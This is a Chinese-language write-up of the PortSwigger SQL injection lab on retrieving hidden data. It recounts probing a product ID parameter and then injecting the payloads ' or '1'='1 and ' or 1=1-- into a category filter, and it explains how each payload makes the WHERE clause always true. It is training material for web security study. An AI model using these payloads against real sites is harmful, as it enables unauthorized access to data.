burpsuite靶场----SQL注入1----where注入
靶场链接
https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data
推荐burpsuite插件
xia sql插件https://github.com/smxiazi/xia_sql
正式开始
1.先随便点个商品的view details
2.在productid处可能存在数字型注入
3.尝试将7换为8-1,发现出现报错 ps:最好不要用6+1,因为+在url表示空格
4.之后在这个地方经过7 and 1=1,7 and 1=1--等都出现这样的报错,猜测这个地方限制只能是数字,所以换个地方测试sql注入
5.点击这些标签
6.加个单引号
7.使用payload
' or '1'='1 成功通关
8.payload 还可以是
' or 1=1--
原理解析
此处的sql语句是
SELECT * FROM products WHERE category = 'Clothing,shoes and accessories' AND released = 1
插入' or '1'='1会变成
SELECT * FROM products WHERE category = 'Clothing,shoes and accessories' or '1'='1' AND released = 1 形成永真
插入' or 1=1--会变成
SELECT * FROM products WHERE category = 'Clothing,shoes and accessories' or 1=1--' AND released = 1
其中--后面的内容会被注释掉,也形成永真